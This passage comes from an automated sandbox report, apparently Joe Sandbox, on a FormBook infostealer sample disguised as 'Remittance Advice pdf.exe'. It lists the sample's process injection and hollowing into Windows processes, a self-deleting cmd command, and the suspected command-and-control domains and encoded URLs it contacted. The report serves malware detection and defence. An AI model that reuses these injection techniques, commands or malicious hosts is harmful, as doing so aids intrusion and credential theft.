          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0369C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03697D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03748D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0367AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03683D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_03728DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0368D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_0373FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_037405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 20_2_036A2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.gazipasadan.xyz
          Source: C:\Windows\explorer.exeDomain query: www.sewadorbsclothing.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 85.159.66.93 80
          Source: C:\Windows\explorer.exeDomain query: www.yakin-hm.com
          Source: C:\Windows\explorer.exeDomain query: www.fux.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 6F0000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 700000 protect: page execute and read and write
          Creates a thread in another existing process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 700000
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10410000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 240000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10410000
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 6F0000
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 700000
          Source: C:\Users\user\Desktop\Remittance Advice pdf.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\DpiScaling.exe'
          Source: explorer.exe, 0000000E.00000000.445317629.0000000000EE0000.00000002.00000001.sdmp, WWAHost.exe, 00000014.00000002.602090705.0000000004D10000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000E.00000000.445317629.0000000000EE0000.00000002.00000001.sdmp, WWAHost.exe, 00000014.00000002.602090705.0000000004D10000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000E.00000000.445317629.0000000000EE0000.00000002.00000001.sdmp, WWAHost.exe, 00000014.00000002.602090705.0000000004D10000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 0000000E.00000000.445317629.0000000000EE0000.00000002.00000001.sdmp, WWAHost.exe, 00000014.00000002.602090705.0000000004D10000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000014.00000002.596597809.0000000000380000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.598641113.0000000002700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499559801.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.501264534.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.499496514.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.10410000.4.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection912Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection912Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 403087 Sample: Remittance Advice pdf.exe Startdate: 03/05/2021 Architecture: WINDOWS Score: 100 31 www.courtclassesathome.com 2->31 33 www.brandonprattdrums.com 2->33 35 3 other IPs or domains 2->35 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 4 other signatures 2->51 11 Remittance Advice pdf.exe 17 2->11         started        signatures3 process4 dnsIp5 43 cdn.discordapp.com 162.159.130.233, 443, 49722, 49723 CLOUDFLARENETUS United States 11->43 63 Writes to foreign memory regions 11->63 65 Allocates memory in foreign processes 11->65 67 Creates a thread in another existing process (thread injection) 11->67 69 Injects a PE file into a foreign processes 11->69 15 DpiScaling.exe 11->15         started        signatures6 process7 signatures8 71 Modifies the context of a thread in another process (thread injection) 15->71 73 Maps a DLL or memory area into another process 15->73 75 Sample uses process hollowing technique 15->75 77 2 other signatures 15->77 18 explorer.exe 15->18 injected process9 dnsIp10 37 shops.myshopify.com 23.227.38.74, 49747, 80 CLOUDFLARENETUS Canada 18->37 39 natroredirect.natrocdn.com 85.159.66.93, 49745, 80 CIZGITR Turkey 18->39 41 6 other IPs or domains 18->41 53 System process connects to network (likely due to code injection or exploit) 18->53 55 Performs DNS queries to domains with low reputation 18->55 22 WWAHost.exe 18->22         started        25 autofmt.exe 18->25         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 22->57 59 Maps a DLL or memory area into another process 22->59 61 Tries to detect virtualization through RDTSC time measurements 22->61 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Remittance Advice pdf.exe34%ReversingLabsWin32.Backdoor.NetWiredRc
          Remittance Advice pdf.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          20.2.WWAHost.exe.3f91b8.1.unpack100%AviraTR/Patched.Ren.Gen8Download File
          20.2.WWAHost.exe.3b87858.5.unpack100%AviraTR/Patched.Ren.Gen8Download File
          13.2.DpiScaling.exe.10410000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.agilelocker.com1%VirustotalBrowse
          brandonprattdrums.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.fux.xyz/nt8e/?blm=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLuBmMcZQmigo4rhukg==&tVTd=M6AhI0%Avira URL Cloudsafe
          http://schemas.micr0%URL Reputationsafe
          http://schemas.micr0%URL Reputationsafe
          http://schemas.micr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.gazipasadan.xyz/nt8e/?blm=IHJLWq3Ti4lOD4kq8gztCbzA17cUlgM1ZPUn0ujbMY4leENIWoOfJYoGYHcW17z38P8xUAoycA==&tVTd=M6AhI0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.brandonprattdrums.com/nt8e/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.sewadorbsclothing.com/nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.agilelocker.com
          52.58.78.16
          truefalseunknown
          parkingpage.namecheap.com
          198.54.117.212
          truefalse
            high
            cdn.discordapp.com
            162.159.130.233
            truefalse
              high
              71822.bodis.com
              199.59.242.153
              truefalse
                high
                brandonprattdrums.com
                34.102.136.180
                truetrueunknown
                shops.myshopify.com
                23.227.38.74
                truetrue
                  unknown
                  natroredirect.natrocdn.com
                  85.159.66.93
                  truetrue
                    unknown
                    www.brandonprattdrums.com
                    unknown
                    unknowntrue
                      unknown
                      www.fux.xyz
                      unknown
                      unknowntrue
                        unknown
                        www.gazipasadan.xyz
                        unknown
                        unknowntrue
                          unknown
                          www.sewadorbsclothing.com
                          unknown
                          unknowntrue
                            unknown
                            www.courtclassesathome.com
                            unknown
                            unknowntrue
                              unknown
                              www.yakin-hm.com
                              unknown
                              unknowntrue
                                unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.fux.xyz/nt8e/?blm=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLuBmMcZQmigo4rhukg==&tVTd=M6AhItrue
                                • Avira URL Cloud: safe
                                unknown
                                http://www.gazipasadan.xyz/nt8e/?blm=IHJLWq3Ti4lOD4kq8gztCbzA17cUlgM1ZPUn0ujbMY4leENIWoOfJYoGYHcW17z38P8xUAoycA==&tVTd=M6AhItrue
                                • Avira URL Cloud: safe
                                unknown
                                www.brandonprattdrums.com/nt8e/true
                                • Avira URL Cloud: safe
                                low
                                http://www.sewadorbsclothing.com/nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhItrue
                                • Avira URL Cloud: safe
                                unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000E.00000000.439337198.000000000095C000.00000004.00000020.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.comexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designersGexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designers/?explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers?explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.tiro.comexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designersexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.goodfont.co.krexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.micrexplorer.exe, 0000000E.00000000.473814734.0000000008551000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.carterandcone.comlexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sajatypeworks.comexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.typography.netDexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://fontfabrik.comexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.founder.com.cn/cnexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8explorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fonts.comexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.sandoll.co.krexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.urwpp.deDPleaseexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cnexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sakkal.comexplorer.exe, 0000000E.00000000.475194070.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      162.159.130.233
                                                      cdn.discordapp.comUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      199.59.242.153
                                                      71822.bodis.comUnited States
                                                      395082BODIS-NJUSfalse
                                                      23.227.38.74
                                                      shops.myshopify.comCanada
                                                      13335CLOUDFLARENETUStrue
                                                      85.159.66.93
                                                      natroredirect.natrocdn.comTurkey
                                                      34619CIZGITRtrue

                                                      General Information

                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                      Analysis ID:403087
                                                      Start date:03.05.2021
                                                      Start time:18:49:34
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 4s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:Remittance Advice pdf.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:27
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@8/1@8/4
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 28.7% (good quality ratio 26.1%)
                                                      • Quality average: 74.8%
                                                      • Quality standard deviation: 30.5%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .exe
                                                      Warnings:
                                                      Show All
                                                      • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.42.151.234, 92.122.145.220, 2.23.155.232, 2.23.155.186, 20.82.210.154, 92.122.213.194, 92.122.213.249, 205.185.216.42, 205.185.216.10, 52.155.217.156, 20.54.26.129, 104.80.23.128
                                                      • TCP Packets have been reduced to 100
